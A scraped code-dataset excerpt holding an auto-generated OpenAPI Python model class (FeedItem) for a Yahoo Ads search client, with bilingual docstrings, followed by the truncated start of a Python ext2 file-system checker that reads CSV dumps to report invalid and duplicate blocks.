'list[str]',\n 'location': 'FeedItemServiceLocation',\n 'placeholder_type': 'FeedItemServicePlaceholderType',\n 'review_custom_parameters': 'FeedItemServiceCustomParameters',\n 'scheduling': 'FeedItemServiceScheduling',\n 'start_date': 'str',\n 'targeting_ad_group': 'FeedItemServiceTargetingAdGroup',\n 'targeting_campaign': 'FeedItemServiceTargetingCampaign',\n 'targeting_keyword': 'FeedItemServiceTargetingKeyword',\n 'trademark_status': 'FeedItemServiceTrademarkStatus'\n }\n\n attribute_map = {\n 'account_id': 'accountId',\n 'approval_status': 'approvalStatus',\n 'custom_parameters': 'customParameters',\n 'device_preference': 'devicePreference',\n 'disapproval_reason_codes': 'disapprovalReasonCodes',\n 'end_date': 'endDate',\n 'feed_id': 'feedId',\n 'feed_item_attribute': 'feedItemAttribute',\n 'feed_item_id': 'feedItemId',\n 'feed_item_track_id': 'feedItemTrackId',\n 'invalided_trademarks': 'invalidedTrademarks',\n 'location': 'location',\n 'placeholder_type': 'placeholderType',\n 'review_custom_parameters': 'reviewCustomParameters',\n 'scheduling': 'scheduling',\n 'start_date': 'startDate',\n 'targeting_ad_group': 'targetingAdGroup',\n 'targeting_campaign': 'targetingCampaign',\n 'targeting_keyword': 'targetingKeyword',\n 'trademark_status': 'trademarkStatus'\n }\n\n def __init__(self, account_id=None, approval_status=None, custom_parameters=None, device_preference=None, disapproval_reason_codes=None, end_date=None, feed_id=None, feed_item_attribute=None, feed_item_id=None, feed_item_track_id=None, invalided_trademarks=None, location=None, placeholder_type=None, review_custom_parameters=None, scheduling=None, start_date=None, targeting_ad_group=None, targeting_campaign=None, targeting_keyword=None, trademark_status=None, local_vars_configuration=None): # noqa: E501\n \"\"\"FeedItem - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._account_id = None\n self._approval_status = None\n self._custom_parameters = None\n self._device_preference = None\n self._disapproval_reason_codes = None\n self._end_date = None\n self._feed_id = None\n self._feed_item_attribute = None\n self._feed_item_id = None\n self._feed_item_track_id = None\n self._invalided_trademarks = None\n self._location = None\n self._placeholder_type = None\n self._review_custom_parameters = None\n self._scheduling = None\n self._start_date = 
None\n self._targeting_ad_group = None\n self._targeting_campaign = None\n self._targeting_keyword = None\n self._trademark_status = None\n self.discriminator = None\n\n self.account_id = account_id\n self.approval_status = approval_status\n self.custom_parameters = custom_parameters\n self.device_preference = device_preference\n self.disapproval_reason_codes = disapproval_reason_codes\n self.end_date = end_date\n self.feed_id = feed_id\n self.feed_item_attribute = feed_item_attribute\n self.feed_item_id = feed_item_id\n self.feed_item_track_id = feed_item_track_id\n self.invalided_trademarks = invalided_trademarks\n self.location = location\n self.placeholder_type = placeholder_type\n self.review_custom_parameters = review_custom_parameters\n self.scheduling = scheduling\n self.start_date = start_date\n self.targeting_ad_group = targeting_ad_group\n self.targeting_campaign = targeting_campaign\n self.targeting_keyword = targeting_keyword\n self.trademark_status = trademark_status\n\n @property\n def account_id(self):\n \"\"\"Gets the account_id of this FeedItem. # noqa: E501\n\n
アカウントIDです。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Account ID. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The account_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._account_id\n\n @account_id.setter\n def account_id(self, account_id):\n \"\"\"Sets the account_id of this FeedItem.\n\n
アカウントIDです。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Account ID. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param account_id: The account_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._account_id = account_id\n\n @property\n def approval_status(self):\n \"\"\"Gets the approval_status of this FeedItem. # noqa: E501\n\n\n :return: The approval_status of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceApprovalStatus\n \"\"\"\n return self._approval_status\n\n @approval_status.setter\n def approval_status(self, approval_status):\n \"\"\"Sets the approval_status of this FeedItem.\n\n\n :param approval_status: The approval_status of this FeedItem. # noqa: E501\n :type: FeedItemServiceApprovalStatus\n \"\"\"\n\n self._approval_status = approval_status\n\n @property\n def custom_parameters(self):\n \"\"\"Gets the custom_parameters of this FeedItem. # noqa: E501\n\n\n :return: The custom_parameters of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceCustomParameters\n \"\"\"\n return self._custom_parameters\n\n @custom_parameters.setter\n def custom_parameters(self, custom_parameters):\n \"\"\"Sets the custom_parameters of this FeedItem.\n\n\n :param custom_parameters: The custom_parameters of this FeedItem. # noqa: E501\n :type: FeedItemServiceCustomParameters\n \"\"\"\n\n self._custom_parameters = custom_parameters\n\n @property\n def device_preference(self):\n \"\"\"Gets the device_preference of this FeedItem. # noqa: E501\n\n\n :return: The device_preference of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceDevicePreference\n \"\"\"\n return self._device_preference\n\n @device_preference.setter\n def device_preference(self, device_preference):\n \"\"\"Sets the device_preference of this FeedItem.\n\n\n :param device_preference: The device_preference of this FeedItem. # noqa: E501\n :type: FeedItemServiceDevicePreference\n \"\"\"\n\n self._device_preference = device_preference\n\n @property\n def disapproval_reason_codes(self):\n \"\"\"Gets the disapproval_reason_codes of this FeedItem. # noqa: E501\n\n
審査否認理由です。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Reject reason on editorial review. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The disapproval_reason_codes of this FeedItem. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._disapproval_reason_codes\n\n @disapproval_reason_codes.setter\n def disapproval_reason_codes(self, disapproval_reason_codes):\n \"\"\"Sets the disapproval_reason_codes of this FeedItem.\n\n
審査否認理由です。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Reject reason on editorial review. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param disapproval_reason_codes: The disapproval_reason_codes of this FeedItem. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._disapproval_reason_codes = disapproval_reason_codes\n\n @property\n def end_date(self):\n \"\"\"Gets the end_date of this FeedItem. # noqa: E501\n\n
配信終了日です。 ※空で設定すると、既存の配信終了日は削除されます。 このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。 End date of ad display. ∗By setting blank, existing end date of ad display will be deleted. This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :return: The end_date of this FeedItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._end_date\n\n @end_date.setter\n def end_date(self, end_date):\n \"\"\"Sets the end_date of this FeedItem.\n\n
配信終了日です。 ※空で設定すると、既存の配信終了日は削除されます。 このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。 End date of ad display. ∗By setting blank, existing end date of ad display will be deleted. This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :param end_date: The end_date of this FeedItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._end_date = end_date\n\n @property\n def feed_id(self):\n \"\"\"Gets the feed_id of this FeedItem. # noqa: E501\n\n
フィードIDです。 このフィールドはレスポンスの際に返却されますが、リクエストの際には無視されます。 ※アドカスタマイザーの場合は、ADD時に必須となります。 Feed ID. Although this field will be returned in the response, it will be ignored on input. *For AD_CUSTOMIZER, this field is required in ADD operation.
# noqa: E501\n\n :return: The feed_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_id\n\n @feed_id.setter\n def feed_id(self, feed_id):\n \"\"\"Sets the feed_id of this FeedItem.\n\n
フィードIDです。 このフィールドはレスポンスの際に返却されますが、リクエストの際には無視されます。 ※アドカスタマイザーの場合は、ADD時に必須となります。 Feed ID. Although this field will be returned in the response, it will be ignored on input. *For AD_CUSTOMIZER, this field is required in ADD operation.
# noqa: E501\n\n :param feed_id: The feed_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_id = feed_id\n\n @property\n def feed_item_attribute(self):\n \"\"\"Gets the feed_item_attribute of this FeedItem. # noqa: E501\n\n\n :return: The feed_item_attribute of this FeedItem. # noqa: E501\n :rtype: list[FeedItemServiceAttribute]\n \"\"\"\n return self._feed_item_attribute\n\n @feed_item_attribute.setter\n def feed_item_attribute(self, feed_item_attribute):\n \"\"\"Sets the feed_item_attribute of this FeedItem.\n\n\n :param feed_item_attribute: The feed_item_attribute of this FeedItem. # noqa: E501\n :type: list[FeedItemServiceAttribute]\n \"\"\"\n\n self._feed_item_attribute = feed_item_attribute\n\n @property\n def feed_item_id(self):\n \"\"\"Gets the feed_item_id of this FeedItem. # noqa: E501\n\n
フィードアイテムIDです。 このフィールドは、SETおよびREMOVE時に必須となり、ADD時に無視されます。 Feed Item ID. This field is required in SET and REMOVE operation, and will be ignored in ADD operation.
# noqa: E501\n\n :return: The feed_item_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_item_id\n\n @feed_item_id.setter\n def feed_item_id(self, feed_item_id):\n \"\"\"Sets the feed_item_id of this FeedItem.\n\n
フィードアイテムIDです。 このフィールドは、SETおよびREMOVE時に必須となり、ADD時に無視されます。 Feed Item ID. This field is required in SET and REMOVE operation, and will be ignored in ADD operation.
# noqa: E501\n\n :param feed_item_id: The feed_item_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_item_id = feed_item_id\n\n @property\n def feed_item_track_id(self):\n \"\"\"Gets the feed_item_track_id of this FeedItem. # noqa: E501\n\n
トラッキング用フィードアイテムIDです。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Feed Item ID for tracking. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The feed_item_track_id of this FeedItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._feed_item_track_id\n\n @feed_item_track_id.setter\n def feed_item_track_id(self, feed_item_track_id):\n \"\"\"Sets the feed_item_track_id of this FeedItem.\n\n
トラッキング用フィードアイテムIDです。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Feed Item ID for tracking. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param feed_item_track_id: The feed_item_track_id of this FeedItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._feed_item_track_id = feed_item_track_id\n\n @property\n def invalided_trademarks(self):\n \"\"\"Gets the invalided_trademarks of this FeedItem. # noqa: E501\n\n
制限された商標です。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Invalided trademarks. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :return: The invalided_trademarks of this FeedItem. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._invalided_trademarks\n\n @invalided_trademarks.setter\n def invalided_trademarks(self, invalided_trademarks):\n \"\"\"Sets the invalided_trademarks of this FeedItem.\n\n
制限された商標です。 このフィールドは、レスポンスの際に返却されますが、リクエストの際には無視されます。 Invalided trademarks. Although this field will be returned in the response, it will be ignored on input.
# noqa: E501\n\n :param invalided_trademarks: The invalided_trademarks of this FeedItem. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._invalided_trademarks = invalided_trademarks\n\n @property\n def location(self):\n \"\"\"Gets the location of this FeedItem. # noqa: E501\n\n\n :return: The location of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceLocation\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"Sets the location of this FeedItem.\n\n\n :param location: The location of this FeedItem. # noqa: E501\n :type: FeedItemServiceLocation\n \"\"\"\n\n self._location = location\n\n @property\n def placeholder_type(self):\n \"\"\"Gets the placeholder_type of this FeedItem. # noqa: E501\n\n\n :return: The placeholder_type of this FeedItem. # noqa: E501\n :rtype: FeedItemServicePlaceholderType\n \"\"\"\n return self._placeholder_type\n\n @placeholder_type.setter\n def placeholder_type(self, placeholder_type):\n \"\"\"Sets the placeholder_type of this FeedItem.\n\n\n :param placeholder_type: The placeholder_type of this FeedItem. # noqa: E501\n :type: FeedItemServicePlaceholderType\n \"\"\"\n\n self._placeholder_type = placeholder_type\n\n @property\n def review_custom_parameters(self):\n \"\"\"Gets the review_custom_parameters of this FeedItem. # noqa: E501\n\n\n :return: The review_custom_parameters of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceCustomParameters\n \"\"\"\n return self._review_custom_parameters\n\n @review_custom_parameters.setter\n def review_custom_parameters(self, review_custom_parameters):\n \"\"\"Sets the review_custom_parameters of this FeedItem.\n\n\n :param review_custom_parameters: The review_custom_parameters of this FeedItem. # noqa: E501\n :type: FeedItemServiceCustomParameters\n \"\"\"\n\n self._review_custom_parameters = review_custom_parameters\n\n @property\n def scheduling(self):\n \"\"\"Gets the scheduling of this FeedItem. # noqa: E501\n\n\n :return: The scheduling of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceScheduling\n \"\"\"\n return self._scheduling\n\n @scheduling.setter\n def scheduling(self, scheduling):\n \"\"\"Sets the scheduling of this FeedItem.\n\n\n :param scheduling: The scheduling of this FeedItem. # noqa: E501\n :type: FeedItemServiceScheduling\n \"\"\"\n\n self._scheduling = scheduling\n\n @property\n def start_date(self):\n \"\"\"Gets the start_date of this FeedItem. # noqa: E501\n\n
配信開始日です。 ※空で設定すると、既存の配信開始日は削除されます。 このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。 Start date of ad display ∗On setting blank, existing start date of ad display will be deleted. This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :return: The start_date of this FeedItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._start_date\n\n @start_date.setter\n def start_date(self, start_date):\n \"\"\"Sets the start_date of this FeedItem.\n\n
配信開始日です。 ※空で設定すると、既存の配信開始日は削除されます。 このフィールドは、ADDおよびSET時に省略可能となり、REMOVE時に無視されます。 Start date of ad display ∗On setting blank, existing start date of ad display will be deleted. This field is optional in ADD and SET operation, and will be ignored in REMOVE operation.
# noqa: E501\n\n :param start_date: The start_date of this FeedItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._start_date = start_date\n\n @property\n def targeting_ad_group(self):\n \"\"\"Gets the targeting_ad_group of this FeedItem. # noqa: E501\n\n\n :return: The targeting_ad_group of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingAdGroup\n \"\"\"\n return self._targeting_ad_group\n\n @targeting_ad_group.setter\n def targeting_ad_group(self, targeting_ad_group):\n \"\"\"Sets the targeting_ad_group of this FeedItem.\n\n\n :param targeting_ad_group: The targeting_ad_group of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingAdGroup\n \"\"\"\n\n self._targeting_ad_group = targeting_ad_group\n\n @property\n def targeting_campaign(self):\n \"\"\"Gets the targeting_campaign of this FeedItem. # noqa: E501\n\n\n :return: The targeting_campaign of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingCampaign\n \"\"\"\n return self._targeting_campaign\n\n @targeting_campaign.setter\n def targeting_campaign(self, targeting_campaign):\n \"\"\"Sets the targeting_campaign of this FeedItem.\n\n\n :param targeting_campaign: The targeting_campaign of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingCampaign\n \"\"\"\n\n self._targeting_campaign = targeting_campaign\n\n @property\n def targeting_keyword(self):\n \"\"\"Gets the targeting_keyword of this FeedItem. # noqa: E501\n\n\n :return: The targeting_keyword of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTargetingKeyword\n \"\"\"\n return self._targeting_keyword\n\n @targeting_keyword.setter\n def targeting_keyword(self, targeting_keyword):\n \"\"\"Sets the targeting_keyword of this FeedItem.\n\n\n :param targeting_keyword: The targeting_keyword of this FeedItem. # noqa: E501\n :type: FeedItemServiceTargetingKeyword\n \"\"\"\n\n self._targeting_keyword = targeting_keyword\n\n @property\n def trademark_status(self):\n \"\"\"Gets the trademark_status of this FeedItem. # noqa: E501\n\n\n :return: The trademark_status of this FeedItem. # noqa: E501\n :rtype: FeedItemServiceTrademarkStatus\n \"\"\"\n return self._trademark_status\n\n @trademark_status.setter\n def trademark_status(self, trademark_status):\n \"\"\"Sets the trademark_status of this FeedItem.\n\n\n :param trademark_status: The trademark_status of this FeedItem. 
# noqa: E501\n :type: FeedItemServiceTrademarkStatus\n \"\"\"\n\n self._trademark_status = trademark_status\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, FeedItem):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, FeedItem):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"ota2000/yahoo-ads-search","sub_path":"yahoo_ads_search/models/feed_item.py","file_name":"feed_item.py","file_ext":"py","file_size_in_byte":25325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37525956204","text":"#!/usr/bin/python\n\nimport sys, string, locale\n\ndef init_lists():\n\t#List of map block numbers for inode and block bitmaps\n\tblock_map_nums = []\n\tinode_map_nums = []\n\twith open(\"group.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\tgroup_line = line.rstrip('\\n').split(',')\n\t\t\tblock_map_nums.append(group_line[5])\n\t\t\tinode_map_nums.append(group_line[4])\n\t#List of free blocks and inodes\n\tfree_blocks = []\n\tfree_inodes = []\n\twith open(\"bitmap.csv\", \"r\") as file_2:\n\t\tfor line in file_2:\n\t\t\tbitmap_line = line.rstrip('\\n').split(',')\n\t\t\tif(bitmap_line[0] in block_map_nums):\n\t\t\t\tfree_blocks.append(int(bitmap_line[1]))\n\t\t\tif(bitmap_line[0] in inode_map_nums):\n\t\t\t\tfree_inodes.append(int(bitmap_line[1]))\n\t#Important information from the super block, such as block size, inodes per group etc\n\tblock_size = 0\n\ttotal_inodes = 0\n\tinodes_per_group = 0\n\ttotal_blocks = 0\n\twith open(\"super.csv\", \"r\") as file_3:\n\t\tfor line in file_3:\n\t\t\tsuper_line = line.rstrip('\\n').split(',')\n\t\t\ttotal_blocks = int(super_line[2])\n\t\t\tblock_size = int(super_line[3])\n\t\t\ttotal_inodes = int(super_line[1])\n\t\t\tinodes_per_group = int(super_line[6])\n\t#Return a tuple of lists to be able to index into to get the respective values\n\treturn (free_blocks, free_inodes, block_map_nums, inode_map_nums, block_size, total_inodes, inodes_per_group, total_blocks)\n\n#Function that finds invalid blocks and unallocated blocks and creates a dictionary of duplicates\ndef block_errors(out_file):\n\t#Create a duplicate dictionary that holds block number keys and list of referenced inode lists\n\tglobal duplicate_dict\n\tlists = init_lists()\n\tfree_blocks = lists[0]\n\tblock_size = lists[4]\n\ttotal_blocks = lists[7]\n\tduplicate_dict = {}\n\twith open(\"inode.csv\", \"r\") as file_3:\n\t\t#Dictionary of block number keys to the corresponding inodes in the free list\n\t\tblock_dict = {}\n\t\tfor line in 
file_3:\n\t\t\tinode_line = line.rstrip('\\n').split(',')\n\t\t\t#Get only the data block pointers\n\t\t\tinode_line_sub = inode_line[11:]\n\t\t\t#Counter for entry number in data block pointers\n\t\t\tcounter = 0\n\t\t\tfor data_block in inode_line_sub:\n\t\t\t\t#Converts hex to decimal\n\t\t\t\tdec_data_block = int(data_block, 16)\n\t\t\t\t#First 12 direct data block pointers\n\t\t\t\tif(counter <= 11):\n\t\t\t\t\tif(dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\\n\")\n\t\t\t\t\t#Check for block in free blocks\n\t\t\t\t\tif(dec_data_block in free_blocks):\n\t\t\t\t\t\t#Initialize block dictionary\n\t\t\t\t\t\tif(str(dec_data_block) not in block_dict):\n\t\t\t\t\t\t\tblock_dict[str(dec_data_block)] = []\n\t\t\t\t\t\ttemp = block_dict[str(dec_data_block)]\n\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\")\n\t\t\t\t\t\tblock_dict[str(dec_data_block)] = temp\n\t\t\t\t\t#Initialize the duplicate dictionary\n\t\t\t\t\tif(str(dec_data_block) not in duplicate_dict):\n\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = []\n\t\t\t\t\ttemp = duplicate_dict[str(dec_data_block)]\n\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + str(counter) + \" >\")\n\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\tcounter += 1\n\t\t\t\t#Single indirect block pointer\n\t\t\t\telif(counter == 12):\n\t\t\t\t\tif(dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"12\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\twith open(\"indirect.csv\", \"r\") as file_4:\n\t\t\t\t\t\t\tfor indirect in file_4:\n\t\t\t\t\t\t\t\tindirect_line = indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t#Check for invalid block pointers\n\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t#Check for pointed blocks in free block map, and add to the respective dictionaries\n\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\")\n\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[12], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\")\n\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\tcounter += 1\n\t\t\t\t#Double indirect block pointer\n\t\t\t\telif(counter == 13):\n\t\t\t\t\tif(dec_data_block < 0 or dec_data_block > 
int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"13\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\tindirect_file = open(\"indirect.csv\", \"r\")\n\t\t\t\t\t\tindirect_data = readlines(indirect_file)\n\t\t\t\t\t\tentry_offset = 0;\n\t\t\t\t\t\t#Go through each single indirect block from the double indirect\n\t\t\t\t\t\tfor indirect in indirect_data:\n\t\t\t\t\t\t\tindirect_line = indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\tentry_offset = int(indirect_line[1]) * (block_size/4 - 1);\n\t\t\t\t\t\t\t#Check for invalid block pointers\n\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t#Go through all the data blocks pointed by each indirect block pointer entry pointed to by the doubly indirect block\n\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\tfor indirect_2 in indirect_data:\n\t\t\t\t\t\t\t\t\tindirect_line = indirect_2.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t\t#Check for invalid data blocks\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\t#Check for blocks in the free block map, and add to the respective dictionaries\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[13], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\t\tcounter += 1\n\t\t\t\t#Triple indirect block pointers\n\t\t\t\telif(counter == 14):\n\t\t\t\t\tif(dec_data_block < 0 or dec_data_block > int(total_blocks)):\n\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_data_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > ENTRY < \" + \"14\" + \" >\\n\")\n\t\t\t\t\tif(dec_data_block != 0):\n\t\t\t\t\t\t#Go through the triple indirect block to each of the pointed to double indirect blocks\n\t\t\t\t\t\tindirect_file = open(\"indirect.csv\", \"r\")\n\t\t\t\t\t\tindirect_data = readlines(indirect_file)\n\t\t\t\t\t\tentry_offset = 0;\n\t\t\t\t\t\tfor indirect in indirect_data:\n\t\t\t\t\t\t\tindirect_line = 
indirect.rstrip('\\n').split(',')\n\t\t\t\t\t\t\tentry_offset = int(indirect_line[1]) * (block_size/4 - 1)\n\t\t\t\t\t\t\t#Check for invalid block pointers in the double indirect block pointers pointed to by the triple indirect block pointers\n\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\t#Go through the double indirect block pointers to the single indirect blocks\n\t\t\t\t\t\t\t\tfor indirect_2 in indirect_data:\n\t\t\t\t\t\t\t\t\tindirect_line = indirect_2.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\tentry_offset += int(indirect_line[1]) * (block_size/4 - 1)\n\t\t\t\t\t\t\t\t\t#Check for invalid block pointers in the single indirect block pointers pointed to by the double indirect block pointers\n\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\tif(int(indirect_line[2], 16) != 0):\n\t\t\t\t\t\t\t\t\t\t#Go through the single indirect block pointers to the data 